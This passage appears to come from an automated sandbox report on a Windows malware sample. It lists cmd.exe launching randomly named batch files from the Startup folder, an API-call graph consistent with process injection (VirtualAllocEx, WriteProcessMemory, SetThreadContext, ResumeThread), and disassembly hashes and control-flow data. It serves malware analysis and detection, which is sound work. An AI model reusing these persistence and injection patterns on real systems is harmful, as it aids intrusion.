                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:12:21:53
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWq659NA2OqtOCxKRUrX3Wvt.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:16
                            Start time:12:21:53
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:17
                            Start time:12:22:01
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMHO1eaoah7nvsSNcEMZSaPH.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:18
                            Start time:12:22:01
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:20
                            Start time:12:22:09
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ybsrj9OwOR4A6LpqK3nX4c7P.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:12:22:09
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:12:22:22
                            Start date:10/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B7apkUpVBoYMsvQw8GBJaP4b.bat" "
                            Imagebase:0x7ff7bace0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:12:22:23
                            Start date:10/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff68cce0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:20.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:3.9%
                              Total number of Nodes:228
                              Total number of Limit Nodes:10
                              execution_graph 60524 7b4d5b0 60525 7b4d5f8 VirtualProtectEx 60524->60525 60527 7b4d636 60525->60527 60798 7b4d850 60799 7b4d895 Wow64SetThreadContext 60798->60799 60801 7b4d8dd 60799->60801 60649 575abb0 60653 575ac97 60649->60653 60663 575aca8 60649->60663 60650 575abbf 60654 575aca8 60653->60654 60657 575acdc 60654->60657 60673 575a004 60654->60673 60657->60650 60658 575aee0 GetModuleHandleW 60660 575af0d 60658->60660 60659 575acd4 60659->60657 60659->60658 60660->60650 60664 575acb9 60663->60664 60668 575acdc 60663->60668 60665 575a004 GetModuleHandleW 60664->60665 60666 575acc4 60665->60666 60666->60668 60671 575af40 GetModuleHandleW 60666->60671 60672 575af3e GetModuleHandleW 60666->60672 60667 575acd4 60667->60668 60669 575aee0 GetModuleHandleW 60667->60669 60668->60650 60670 575af0d 60669->60670 60670->60650 60671->60667 60672->60667 60674 575ae98 GetModuleHandleW 60673->60674 60676 575acc4 60674->60676 60676->60657 60677 575af40 60676->60677 60680 575af3e 60676->60680 60678 575a004 GetModuleHandleW 60677->60678 60679 575af54 60678->60679 60679->60659 60681 575a004 GetModuleHandleW 60680->60681 60682 575af54 60680->60682 60681->60682 60682->60659 60528 7b4dab8 60529 7b4daf8 ResumeThread 60528->60529 60531 7b4db29 60529->60531 60532 7b4c438 60533 7b4c47d Wow64GetThreadContext 60532->60533 60535 7b4c4c5 60533->60535 60802 7b4dcd8 60803 7b4de63 60802->60803 60804 7b4dcfe 60802->60804 60804->60803 60806 7b4b2f8 60804->60806 60807 7b4df58 PostMessageW 60806->60807 60808 7b4dfc4 60807->60808 60808->60804 60683 575d338 60684 575d37e GetCurrentProcess 60683->60684 60686 575d3d0 GetCurrentThread 60684->60686 60687 575d3c9 60684->60687 60688 575d406 60686->60688 60689 575d40d GetCurrentProcess 60686->60689 60687->60686 60688->60689 60690 575d443 60689->60690 60695 575d518 60690->60695 60698 575d508 60690->60698 60691 575d46b GetCurrentThreadId 60692 575d49c 60691->60692 60702 575b690 60695->60702 60699 575d518 60698->60699 60700 575b690 DuplicateHandle 60699->60700 60701 575d546 60700->60701 60701->60691 60703 575d580 DuplicateHandle 60702->60703 60704 575d546 60703->60704 60704->60691 60639 5818e30 60640 5818e31 60639->60640 60641 5818e52 60640->60641 60642 57527ec 3 API calls 60640->60642 60644 5758298 60640->60644 60642->60641 60645 57582a8 60644->60645 60646 5758599 60645->60646 60647 575c7e1 3 API calls 60645->60647 60648 575cc61 3 API calls 60645->60648 60646->60641 60647->60646 60648->60646 60536 7b4cb20 60537 7b4cb60 VirtualAllocEx 60536->60537 60539 7b4cb9d 60537->60539 60540 7b455a0 60541 7b455d3 60540->60541 60542 7b45a01 60541->60542 60545 7b47be8 60541->60545 60549 7b480f0 60541->60549 60546 7b47bf6 60545->60546 60547 7b47bfd 60545->60547 60546->60541 60547->60546 60553 7b4a478 60547->60553 60551 7b48117 60549->60551 60550 7b481db 60550->60541 60551->60550 60552 7b4a478 CreateProcessAsUserW 60551->60552 60552->60551 60554 7b4a4f7 CreateProcessAsUserW 60553->60554 60556 7b4a5f8 60554->60556 60705 7b4ce60 60706 7b4cea8 WriteProcessMemory 60705->60706 60708 7b4ceff 60706->60708 60557 5edc978 60558 5edc9be GetLongPathNameW 60557->60558 60560 5edc9f7 60558->60560 60561 5752a60 60562 5752a85 60561->60562 60565 57522c8 60562->60565 60564 5752a96 60566 57522d3 60565->60566 60569 575278c 60566->60569 60568 5755375 60568->60564 60570 5752797 60569->60570 60573 57527bc 60570->60573 60572 575545a 60572->60568 60574 57527c7 60573->60574 60577 57527ec 60574->60577 60576 575555c 60576->60572 60579 57527f7 60577->60579 60578 5758599 60578->60576 60579->60578 60582 575c7e1 60579->60582 60587 575cc61 60579->60587 60583 575cd41 60582->60583 60584 575cd55 60583->60584 60592 575ce20 60583->60592 60596 575ce10 60583->60596 60584->60584 60588 575cc91 60587->60588 60589 575ccb5 60588->60589 60590 575ce20 3 API calls 60588->60590 60591 575ce10 3 API calls 60588->60591 60589->60578 60590->60589 60591->60589 60593 575ce2d 60592->60593 60594 575ce67 60593->60594 60600 575b680 60593->60600 60594->60584 60597 575ce20 60596->60597 60598 575b680 3 API calls 60597->60598 60599 575ce67 60597->60599 60598->60599 60599->60584 60601 575b68b 60600->60601 60603 575db78 60601->60603 60604 575cf84 60601->60604 60603->60603 60605 575cf8f 60604->60605 60606 57527ec 3 API calls 60605->60606 60607 575dbe7 60606->60607 60611 575f940 60607->60611 60618 575f91f 60607->60618 60608 575dc21 60608->60603 60613 575f971 60611->60613 60614 575fa72 60611->60614 60612 575f97d 60612->60608 60613->60612 60624 58109b0 60613->60624 60629 5810955 60613->60629 60634 58109c0 60613->60634 60614->60608 60620 575f92c 60618->60620 60619 575f97d 60619->60608 60620->60619 60621 58109b0 3 API calls 60620->60621 60622 58109c0 3 API calls 60620->60622 60623 5810955 3 API calls 60620->60623 60621->60619 60622->60619 60623->60619 60625 58109b8 60624->60625 60626 581099b 60625->60626 60627 58118a0 CreateWindowExW CreateWindowExW CreateWindowExW 60625->60627 60628 5811793 CreateWindowExW CreateWindowExW CreateWindowExW 60625->60628 60626->60614 60627->60626 60628->60626 60630 58109ce 60629->60630 60631 5810a9a 60630->60631 60632 58118a0 CreateWindowExW CreateWindowExW CreateWindowExW 60630->60632 60633 5811793 CreateWindowExW CreateWindowExW CreateWindowExW 60630->60633 60632->60631 60633->60631 60635 58109c5 60634->60635 60636 5810a9a 60635->60636 60637 58118a0 CreateWindowExW CreateWindowExW CreateWindowExW 60635->60637 60638 5811793 CreateWindowExW CreateWindowExW CreateWindowExW 60635->60638 60637->60636 60638->60636 60709 778a820 60710 778a834 60709->60710 60711 778a844 60710->60711 60722 778ac11 60710->60722 60712 778a8ad 60711->60712 60727 7b414bd 60711->60727 60731 7b41f9d 60711->60731 60735 7b41e0c 60711->60735 60739 7b415c1 60711->60739 60744 7b41620 60711->60744 60748 7b41db7 60711->60748 60752 7b42d47 60711->60752 60756 7b4130b 60711->60756 60723 778ac19 60722->60723 60760 778b8b8 60723->60760 60763 778b88f 60723->60763 60724 778ac37 60767 7b43262 60727->60767 60770 7b43268 60727->60770 60728 7b414e1 60733 7b43262 VirtualProtect 60731->60733 60734 7b43268 VirtualProtect 60731->60734 60732 7b41fb7 60733->60732 60734->60732 60737 7b43262 VirtualProtect 60735->60737 60738 7b43268 VirtualProtect 60735->60738 60736 7b41e4a 60737->60736 60738->60736 60740 7b415b6 60739->60740 60740->60739 60741 7b41633 60740->60741 60742 7b43262 VirtualProtect 60740->60742 60743 7b43268 VirtualProtect 60740->60743 60742->60741 60743->60741 60746 7b43262 VirtualProtect 60744->60746 60747 7b43268 VirtualProtect 60744->60747 60745 7b41633 60746->60745 60747->60745 60750 7b43262 VirtualProtect 60748->60750 60751 7b43268 VirtualProtect 60748->60751 60749 7b41dcb 60750->60749 60751->60749 60754 7b43262 VirtualProtect 60752->60754 60755 7b43268 VirtualProtect 60752->60755 60753 7b42d58 60754->60753 60755->60753 60758 7b43262 VirtualProtect 60756->60758 60759 7b43268 VirtualProtect 60756->60759 60757 7b4131c 60758->60757 60759->60757 60761 778b900 VirtualProtect 60760->60761 60762 778b93a 60761->60762 60762->60724 60766 778b7a5 60763->60766 60764 778b900 VirtualProtect 60765 778b93a 60764->60765 60765->60724 60766->60763 60766->60764 60768 7b432b0 VirtualProtect 60767->60768 60769 7b432ea 60768->60769 60769->60728 60771 7b432b0 VirtualProtect 60770->60771 60772 7b432ea 60771->60772 60772->60728 60773 79604c8 60774 79604cd 60773->60774 60775 79604f0 60774->60775 60778 7960530 60774->60778 60784 796051b 60774->60784 60779 796053e 60778->60779 60781 796055d 60778->60781 60789 79606a0 60779->60789 60792 79606a8 CloseHandle 60779->60792 60780 7960559 60780->60775 60781->60775 60785 796052f 60784->60785 60787 79606a0 CloseHandle 60785->60787 60788 79606a8 CloseHandle 60785->60788 60786 7960559 60786->60775 60787->60786 60788->60786 60790 79606a7 CloseHandle 60789->60790 60791 796070f 60790->60791 60791->60780 60793 796070f 60792->60793 60793->60780 60794 5813ede 60795 5813ef2 60794->60795 60797 5813ef9 60794->60797 60796 5813f4a CallWindowProcW 60795->60796 60795->60797 60796->60797

                              Executed Functions

                              Function 012C366B Relevance: 12.2, Strings: 9, Instructions: 900COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                              • API String ID: 0-2006360050
                              • Opcode ID: e570be11bdecad535b1755d26ca0c63b03442608c24b23c1962806f11dee1548
                              • Instruction ID: a20cf470f053d88fb2727128b5f11fa76e34e831bc8182f1b39287a260ba3a9b
                              • Opcode Fuzzy Hash: e570be11bdecad535b1755d26ca0c63b03442608c24b23c1962806f11dee1548
                              • Instruction Fuzzy Hash: C1829030A1024ADFCB15DF68C984AAEBBF2FF88714F158A5DE6469B261D770EC41CB50
                              Function 07783BBE Relevance: 7.1, Strings: 3, Instructions: 3324COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 805 7783bbe-7783c6c 808 7783c72-7783d6c 805->808 809 7783d74-7783d76 805->809 808->809 810 7783d78-7783d7b 809->810 811 7783d7d-7783d8d 809->811 813 7783dbb-77851fa 810->813 815 7783d8f-7783da0 811->815 816 7783da2-7783db8 811->816 1074 7786eab 813->1074 1075 7785200-7785288 813->1075 815->813 816->813 1077 7786eb0-7786ec4 1074->1077 1455 778528e call 7787e50 1075->1455 1456 778528e call 7787e41 1075->1456 1080 7786ecc-7786ed4 1077->1080 1081 7786ec6-7786ec9 1077->1081 1083 7786eed-7786f06 1080->1083 1084 7786ed5-7786ee9 1080->1084 1081->1080 1085 7786f48-7786f50 1083->1085 1086 7786f08-7786f46 1083->1086 1084->1083 1087 7786f55-7786f7c 1085->1087 1086->1085 1089 7786fa8-7786fbd 1087->1089 1090 7786f7e-7786f8f 1087->1090 1091 7786f90-7786f9c 1089->1091 1092 7786fbf-7786ff4 1089->1092 1090->1091 1091->1087 1094 7786f9e-7786fa6 1091->1094 1095 7787024-7787038 1092->1095 1096 7786ff6-7786ff9 1092->1096 1094->1089 1099 778703a-778703e 1095->1099 1100 7787095-77870c8 1095->1100 1097 7786ffb-7787010 1096->1097 1098 7787014-7787022 1096->1098 1097->1098 1098->1095 1103 7785291-7785484 1127 778548a-7785579 1103->1127 1128 778557e-778566c 1103->1128 1149 778566f-7786bf9 1127->1149 1128->1149 1149->1077 1421 7786bff-7786c1d 1149->1421 1457 7786c1f call 12c13a8 1421->1457 1458 7786c1f call 12c13a3 1421->1458 1422 7786c24-7786d3a 1422->1077 1434 7786d40-7786d45 1422->1434 1435 7786d64-7786e3b 1434->1435 1436 7786d47-7786d5f 1434->1436 1435->1077 1451 7786e3d-7786e70 1435->1451 1437 7786e76-7786eaa 1436->1437 1451->1437 1455->1103 1456->1103 1457->1422 1458->1422
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$@$G
                              • API String ID: 0-3628805992
                              • Opcode ID: 8bde6e691f73f0abfa2216fd3a6961542f8e5176c7976f9448e051acd45b1638
                              • Instruction ID: df3bf9305a6600f2669547b06b90382ad8e2b57ba492e379563d1c4644d643c1
                              • Opcode Fuzzy Hash: 8bde6e691f73f0abfa2216fd3a6961542f8e5176c7976f9448e051acd45b1638
                              • Instruction Fuzzy Hash: 04539D70E142298FCB54FFB8DC8975CBBB5AF88204F5084E9D48DA7241DE386D85CB66
                              Function 076D3F85 Relevance: 5.5, Instructions: 5514COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1506 76d3f85-76d41e6 1535 76d41ec-76d4eff 1506->1535 1536 76d624a-76d64f7 1506->1536 1934 76d527f-76d6242 1535->1934 1935 76d4f05-76d5277 1535->1935 1603 76d64fd-76d73d3 1536->1603 1604 76d73db-76d8370 1536->1604 1603->1604 2165 76d86f6-76d8709 1604->2165 2166 76d8376-76d86ee 1604->2166 1934->1536 1935->1934 2171 76d870f-76d8d43 2165->2171 2172 76d8d4b-76d9bdc 2165->2172 2166->2165 2171->2172 2554 76d9bdc call 76db0dd 2172->2554 2555 76d9bdc call 76db0ec 2172->2555 2552 76d9be2-76d9be9 2554->2552 2555->2552
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1c5dcd9434748b3624b02f65a53a18edb731fe3116e30af74531faa68eb5b3c6
                              • Instruction ID: 9fe8d64ee73d0be81ad9a989ad833aaf3b9ee13cdcf59a1bf97cdfd40d848a1a
                              • Opcode Fuzzy Hash: 1c5dcd9434748b3624b02f65a53a18edb731fe3116e30af74531faa68eb5b3c6
                              • Instruction Fuzzy Hash: 48B37970E112198FCB28FF78D99966CBBB2BB89300F4085E9C84AA7254EF345D85CF55
                              Function 076D3FB0 Relevance: 5.5, Instructions: 5499COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2556 76d3fb0-76d41e6 2584 76d41ec-76d4eff 2556->2584 2585 76d624a-76d64f7 2556->2585 2983 76d527f-76d6242 2584->2983 2984 76d4f05-76d5277 2584->2984 2652 76d64fd-76d73d3 2585->2652 2653 76d73db-76d8370 2585->2653 2652->2653 3214 76d86f6-76d8709 2653->3214 3215 76d8376-76d86ee 2653->3215 2983->2585 2984->2983 3220 76d870f-76d8d43 3214->3220 3221 76d8d4b-76d9bdc 3214->3221 3215->3214 3220->3221 3603 76d9bdc call 76db0dd 3221->3603 3604 76d9bdc call 76db0ec 3221->3604 3601 76d9be2-76d9be9 3603->3601 3604->3601
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b7f529fe8be6743ae94f27aa9ab9bedea83eb0729ec92e33029763b3ddd1f8f
                              • Instruction ID: 6a7bd2a0565c91159be374e4119b72e2a2886d9abe4a8092110507291cd0d789
                              • Opcode Fuzzy Hash: 9b7f529fe8be6743ae94f27aa9ab9bedea83eb0729ec92e33029763b3ddd1f8f
                              • Instruction Fuzzy Hash: 86B36970E112198FCB28FF78D99966CBBB2BB89300F4085E9C84AA7254EF345D85CF55
                              Function 012C3118 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3605 12c3118-12c313b 3606 12c313d-12c3143 3605->3606 3607 12c3146-12c3166 3605->3607 3606->3607 3610 12c316d-12c3174 3607->3610 3611 12c3168 3607->3611 3613 12c3176-12c3181 3610->3613 3612 12c34fc-12c3505 3611->3612 3614 12c350d-12c3519 3613->3614 3615 12c3187-12c319a 3613->3615 3618 12c319c-12c31aa 3615->3618 3619 12c31b0-12c31cb 3615->3619 3618->3619 3622 12c3484-12c348b 3618->3622 3623 12c31cd-12c31d3 3619->3623 3624 12c31ef-12c31f2 3619->3624 3622->3612 3627 12c348d-12c348f 3622->3627 3625 12c31dc-12c31df 3623->3625 3626 12c31d5 3623->3626 3628 12c334c-12c3352 3624->3628 3629 12c31f8-12c31fb 3624->3629 3631 12c3212-12c3218 3625->3631 3632 12c31e1-12c31e4 3625->3632 3626->3625 3626->3628 3630 12c343e-12c3441 3626->3630 3626->3631 3633 12c349e-12c34a4 3627->3633 3634 12c3491-12c3496 3627->3634 3628->3630 3635 12c3358-12c335d 3628->3635 3629->3628 3636 12c3201-12c3207 3629->3636 3637 12c3508 3630->3637 3638 12c3447-12c344d 3630->3638 3639 12c321e-12c3220 3631->3639 3640 12c321a-12c321c 3631->3640 3641 12c327e-12c3284 3632->3641 3642 12c31ea 3632->3642 3633->3614 3643 12c34a6-12c34ab 3633->3643 3634->3633 3635->3630 3636->3628 3644 12c320d 3636->3644 3637->3614 3646 12c344f-12c3457 3638->3646 3647 12c3472-12c3476 3638->3647 3648 12c322a-12c3233 3639->3648 3640->3648 3641->3630 3645 12c328a-12c3290 3641->3645 3642->3630 3649 12c34ad-12c34b2 3643->3649 3650 12c34f0-12c34f3 3643->3650 3644->3630 3651 12c3296-12c3298 3645->3651 3652 12c3292-12c3294 3645->3652 3646->3614 3653 12c345d-12c346c 3646->3653 3647->3622 3656 12c3478-12c347e 3647->3656 3654 12c3235-12c3240 3648->3654 3655 12c3246-12c326e 3648->3655 3649->3637 3658 12c34b4 3649->3658 3650->3637 3657 12c34f5-12c34fa 3650->3657 3660 12c32a2-12c32b9 3651->3660 3652->3660 3653->3619 3653->3647 3654->3630 3654->3655 3678 12c3274-12c3279 3655->3678 3679 12c3362-12c3398 3655->3679 3656->3613 3656->3622 3657->3612 3657->3627 3659 12c34bb-12c34c0 3658->3659 3661 12c34e2-12c34e4 3659->3661 3662 12c34c2-12c34c4 3659->3662 3671 12c32bb-12c32d4 3660->3671 3672 12c32e4-12c330b 3660->3672 3661->3637 3669 12c34e6-12c34e9 3661->3669 3666 12c34c6-12c34cb 3662->3666 3667 12c34d3-12c34d9 3662->3667 3666->3667 3667->3614 3670 12c34db-12c34e0 3667->3670 3669->3650 3670->3661 3674 12c34b6-12c34b9 3670->3674 3671->3679 3684 12c32da-12c32df 3671->3684 3672->3637 3683 12c3311-12c3314 3672->3683 3674->3637 3674->3659 3678->3679 3685 12c339a-12c339e 3679->3685 3686 12c33a5-12c33ad 3679->3686 3683->3637 3687 12c331a-12c3343 3683->3687 3684->3679 3688 12c33bd-12c33c1 3685->3688 3689 12c33a0-12c33a3 3685->3689 3686->3637 3690 12c33b3-12c33b8 3686->3690 3687->3679 3702 12c3345-12c334a 3687->3702 3691 12c33e0-12c33e4 3688->3691 3692 12c33c3-12c33c9 3688->3692 3689->3686 3689->3688 3690->3630 3695 12c33ee-12c340d call 12c366b 3691->3695 3696 12c33e6-12c33ec 3691->3696 3692->3691 3694 12c33cb-12c33d3 3692->3694 3694->3637 3697 12c33d9-12c33de 3694->3697 3699 12c3413-12c3417 3695->3699 3696->3695 3696->3699 3697->3630 3699->3630 3700 12c3419-12c3435 3699->3700 3700->3630 3702->3679
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o_q$(o_q$,cq$,cq
                              • API String ID: 0-196421762
                              • Opcode ID: 5781e9bd8af6076deddc454b424963c465603ad9062e020d530038f0b971bf6e
                              • Instruction ID: f6668d6a0988fe5b11c553bce123d4258ed4802be13e6e61904c7ff9909b71f0
                              • Opcode Fuzzy Hash: 5781e9bd8af6076deddc454b424963c465603ad9062e020d530038f0b971bf6e
                              • Instruction Fuzzy Hash: E2D14C34A1010ADFCB25CFA9D884AADBBF2FF88744F15CA69E615A7261DB31D841CB50
                              Function 05ED4E58 Relevance: 5.2, Instructions: 5237COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 4659 5ed4e58-5eda616 call 5edbd9f 5611 5eda61c-5eda623 4659->5611
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776300472.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5ed0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 274cb2394a96f93b916b76a720a065e947317fb70e7759ea9b100001d94af7cd
                              • Instruction ID: f978727cd28d5c5b4989700be7c2507f3d99e650fbeba0e9e32d7f98b023a7ee
                              • Opcode Fuzzy Hash: 274cb2394a96f93b916b76a720a065e947317fb70e7759ea9b100001d94af7cd
                              • Instruction Fuzzy Hash: D6B35C70A1121A8FCB54FF39E98966CBBF2BB88210F4085F9D488A7254EF345E85CF55
                              Function 07B4A9F8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 5613 7b4a9f8-7b4aa1d 5614 7b4aa24-7b4aa48 5613->5614 5615 7b4aa1f 5613->5615 5616 7b4aa49 5614->5616 5615->5614 5617 7b4aa50-7b4aa6c 5616->5617 5618 7b4aa75-7b4aa76 5617->5618 5619 7b4aa6e 5617->5619 5625 7b4ac9b-7b4aca4 5618->5625 5619->5616 5619->5618 5620 7b4ac76-7b4ac88 5619->5620 5621 7b4abf0-7b4ac08 5619->5621 5622 7b4ab52-7b4ab65 5619->5622 5623 7b4ac3b-7b4ac6e call 7b44388 5619->5623 5624 7b4aa7b-7b4aa9f 5619->5624 5619->5625 5626 7b4aba5-7b4aba8 call 7b4ad00 5619->5626 5627 7b4aaa1-7b4aab2 5619->5627 5628 7b4ac8d-7b4ac96 5619->5628 5629 7b4abce-7b4abd1 5619->5629 5630 7b4ab0e-7b4ab26 5619->5630 5631 7b4aac8-7b4aad0 5619->5631 5632 7b4ab6a-7b4ab9d call 7b48d38 5619->5632 5620->5617 5651 7b4ac0a-7b4ac19 5621->5651 5652 7b4ac1b-7b4ac22 5621->5652 5622->5617 5623->5620 5624->5617 5640 7b4abae-7b4abc9 5626->5640 5646 7b4aab4-7b4aac6 5627->5646 5647 7b4aad2-7b4aad4 5627->5647 5628->5617 5642 7b4abda-7b4abeb 5629->5642 5649 7b4ab28-7b4ab37 5630->5649 5650 7b4ab39-7b4ab40 5630->5650 5633 7b4aad7-7b4aae2 5631->5633 5632->5626 5637 7b4aae4-7b4aaf3 5633->5637 5638 7b4aaf5-7b4aafc 5633->5638 5648 7b4ab03-7b4ab09 5637->5648 5638->5648 5640->5617 5642->5617 5646->5617 5647->5633 5648->5617 5656 7b4ab47-7b4ab4d 5649->5656 5650->5656 5653 7b4ac29-7b4ac36 5651->5653 5652->5653 5653->5617 5656->5617
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: e\1$e\1$"*p$"*p
                              • API String ID: 0-1513742261
                              • Opcode ID: faf3de550da1f165c189e6fad667a08632725b91a05e4d5885f65a502baafc52
                              • Instruction ID: aba5b6724bbe78141d36990939b6704bf7d57c2f034630edbd4674f00889fac6
                              • Opcode Fuzzy Hash: faf3de550da1f165c189e6fad667a08632725b91a05e4d5885f65a502baafc52
                              • Instruction Fuzzy Hash: 7481F3B1D11219CFDB14CFA9D9846AEBBB2BF89300F20946AD416BB354DB345901DF98
                              Function 07B43370 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 5809 7b43370-7b4338a 5810 7b43391-7b4343c 5809->5810 5811 7b4338c 5809->5811 5821 7b4343f 5810->5821 5811->5810 5822 7b43446-7b43462 5821->5822 5823 7b43464 5822->5823 5824 7b4346b-7b4346c 5822->5824 5823->5821 5823->5824 5825 7b435a4-7b435a8 5823->5825 5826 7b43550-7b4358f 5823->5826 5827 7b43471-7b4348b 5823->5827 5828 7b4348d-7b4351d 5823->5828 5829 7b435db-7b435e1 5823->5829 5824->5829 5830 7b435aa-7b435b9 5825->5830 5831 7b435bb-7b435c2 5825->5831 5849 7b43591 call 7b44b60 5826->5849 5850 7b43591 call 7b44b50 5826->5850 5827->5822 5846 7b43530-7b43537 5828->5846 5847 7b4351f-7b4352e 5828->5847 5832 7b435c9-7b435d6 5830->5832 5831->5832 5832->5822 5843 7b43597-7b4359f 5843->5822 5848 7b4353e-7b4354b 5846->5848 5847->5848 5848->5822 5849->5843 5850->5843
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
